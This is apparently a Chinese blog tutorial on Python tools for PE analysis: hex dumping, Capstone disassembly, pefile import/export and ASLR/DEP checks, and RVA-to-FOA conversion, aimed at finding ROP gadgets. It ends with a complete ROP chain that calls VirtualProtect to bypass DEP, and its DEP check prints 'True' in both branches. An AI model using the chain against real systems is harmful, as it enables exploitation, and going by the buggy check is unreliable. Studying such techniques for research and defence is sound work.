Python进制转换与反汇编实现流程介绍

通过利用反汇编库，并使用python编写工具，读取PE结构中的基地址偏移地址，找到OEP并计算成FOA文件偏移，使用反汇编库对其进行反汇编，并从反汇编代码里查找事先准备好的ROP绕过代码，让其自动完成搜索，这里给出实现思路与部分代码片段。

十六进制转换器 可自行添加上，文件与偏移对应关系，即可实现指定位置的数据转换，这里给出坑爹版实现，自己晚膳吧。

#coding:utf-8
import os,sys
import binascii
# binascii.a2b_hex(\"4d\")
if __name__ == \"__main__\":
    count = 0
    size = os.path.getsize(\"qq.exe\")
    print(\"文件指针: {}\".format(size))
    fp = open(\"qq.exe\",\"rb\")
    lis = []
    for item in range(500):
        char = fp.read(1)
        count = count + 1
        if count % 16 == 0:
            if ord(char) < 16:
                print(\"0\" + hex(ord(char))[2:])
            else:
                print(hex(ord(char))[2:])
        else:
            if ord(char) < 16:
                print(\"0\" + hex(ord(char))[2:] + \" \",end=\"\")
            else:
                print(hex(ord(char))[2:] + \" \",end=\"\")

二进制与字符串互转

import os
def to_ascii(h):
    list_s = []
    for i in range(0, len(h), 2):
        list_s.append(chr(int(h[i:i+2], 16)))
    return \'\'.join(list_s)
def to_hex(s):
    list_h = []
    for c in s:
        list_h.append(hex(ord(c))[2:])
    return \'\'.join(list_h)
with open(\"d://run.exe\",\"rb\") as fp:
    lis = []
    for x in range(10240):
        for i in range(64):
            char = fp.read(1)
            print(to_ascii(hex(ord(char))[2:]),end=\"\")
        print(\"\")

反汇编框架

import os
from capstone import *
CODE = b\"\\x55\\x8b\\xec\\x6a\\x00\\xff\\x15\\x44\\x30\\x11\\x00\"
md = Cs(CS_ARCH_X86, CS_MODE_32)
for i in md.disasm(CODE, 0x1000):
    print(\"大小: %3s 地址: %-5s 指令: %-7s 操作数: %-10s\"% (i.size,i.address,i.mnemonic,i.op_str))
print(\"*\" * 100)
CODE64 = b\"\\x55\\x48\\x8b\\x05\\xb8\\x13\\x00\\x00\\xe9\\xea\\xbe\\xad\\xde\\xff\\x25\\x23\\x01\\x00\\x00\\xe8\\xdf\\xbe\\xad\\xde\\x74\\xff\"
md = Cs(CS_ARCH_X86, CS_MODE_64)
for i in md.disasm(CODE64, 0x1000):
    print(\"大小: %3s 地址: %-5s 指令: %-7s 操作数: %-10s\"% (i.size,i.address,i.mnemonic,i.op_str))

读取pE结构的代码 读取导入导出表，用Python 实在太没意思了，请看C/C++ 实现PE解析工具笔记。

def ScanImport(filename):
    pe = pefile.PE(filename)
    print(\"-\" * 100)
    try:
        for x in pe.DIRECTORY_ENTRY_IMPORT:
            for y in x.imports:
                print(\"[*] 模块名称: %-20s 导入函数: %-14s\" %((x.dll).decode(\"utf-8\"),(y.name).decode(\"utf-8\")))
    except Exception:
        pass
    print(\"-\" * 100)
def ScanExport(filename):
    pe = pefile.PE(filename)
    print(\"-\" * 100)
    try:
        for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
            print(\"[*] 导出序号: %-5s 模块地址: %-20s 模块名称: %-15s\" 
            %(exp.ordinal,hex(pe.OPTIONAL_HEADER.ImageBase + exp.address),(exp.name).decode(\"utf-8\")))
    except:
        pass
    print(\"-\" * 100)

验证DEP+ASLR

    # 随机基址 => hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x40 == 0x40
    if( (pe.OPTIONAL_HEADER.DllCharacteristics & 64)==64 ):
        print(\"基址随机化: True\")
    else:
        print(\"基址随机化: False\")
    # 数据不可执行 DEP => hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x100 == 0x100
    if( (pe.OPTIONAL_HEADER.DllCharacteristics & 256)==256 ):
        print(\"DEP保护状态: True\")
    else:
        print(\"DEP保护状态: True\")
    # 强制完整性=> hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x80 == 0x80
    if ( (pe.OPTIONAL_HEADER.DllCharacteristics & 128)==128 ):
        print(\"强制完整性: True\")
    else:
        print(\"强制完整性: False\")
    if ( (pe.OPTIONAL_HEADER.DllCharacteristics & 1024)==1024 ):
        print(\"SEH异常保护: False\")
    else:
        print(\"SEH异常保护: True\")

VA转FOA地址

import os
import pefile
def RVA_To_FOA(FilePath):
    pe = pefile.PE(FilePath)
    ImageBase = pe.OPTIONAL_HEADER.ImageBase
    for item in pe.sections:
        if str(item.Name.decode(\'UTF-8\').strip(b\'\\x00\'.decode())) == \".text\":
            #print(\"虚拟地址: 0x%.8X 虚拟大小: 0x%.8X\" %(item.VirtualAddress,item.Misc_VirtualSize))
            VirtualAddress = item.VirtualAddress
            VirtualSize = item.Misc_VirtualSize
            ActualOffset = item.PointerToRawData
    StartVA = hex(ImageBase + VirtualAddress)
    StopVA = hex(ImageBase + VirtualAddress + VirtualSize)
    print(\"[+] 代码段起始地址: {} 结束: {} 实际偏移:{} 长度: {}\".format(StartVA,StopVA,ActualOffset,VirtualSize))
    with open(FilePath,\"rb\") as fp:
        fp.seek(ActualOffset)
        HexCode = fp.read(VirtualSize)
        print(HexCode)
RVA_To_FOA(\"d://lyshark.exe\")

给出一条过保护的ROP链

rop = struct.pack (\'<L\',0x7c349614)   # ret
rop += struct.pack(\'<L\',0x7c34728e)   # pop eax
rop += struct.pack(\'<L\',0xfffffcdf)   #
rop += struct.pack(\'<L\',0x7c379c10)   # add ebp,eax
rop += struct.pack(\'<L\',0x7c34728e)   # pop eax
rop += struct.pack(\'<L\',0xfffffdff)   # value = 0x201
rop += struct.pack(\'<L\',0x7c353c73)   # neg eax
rop += struct.pack(\'<L\',0x7c34373a)   # pop ebx
rop += struct.pack(\'<L\',0xffffffff)   #
rop += struct.pack(\'<L\',0x7c345255)   # inc ebx
rop += struct.pack(\'<L\',0x7c352174)   # add ebx,eax
rop += struct.pack(\'<L\',0x7c344efe)   # pop edx
rop += struct.pack(\'<L\',0xffffffc0)   # 0x40h
rop += struct.pack(\'<L\',0x7c351eb1)   # neg edx
rop += struct.pack(\'<L\',0x7c36ba51)   # pop ecx
rop += struct.pack(\'<L\',0x7c38f2f4)   # &writetable
rop += struct.pack(\'<L\',0x7c34a490)   # pop edi
rop += struct.pack(\'<L\',0x7c346c0b)   # ret (rop nop)
rop += struct.pack(\'<L\',0x7c352dda)   # pop esi
rop += struct.pack(\'<L\',0x7c3415a2)   # jmp [eax]
rop += struct.pack(\'<L\',0x7c34d060)   # pop eax
rop += struct.pack(\'<L\',0x7c37a151)   # ptr to virtualProtect()
rop += struct.pack(\'<L\',0x625011ed)   # jmp esp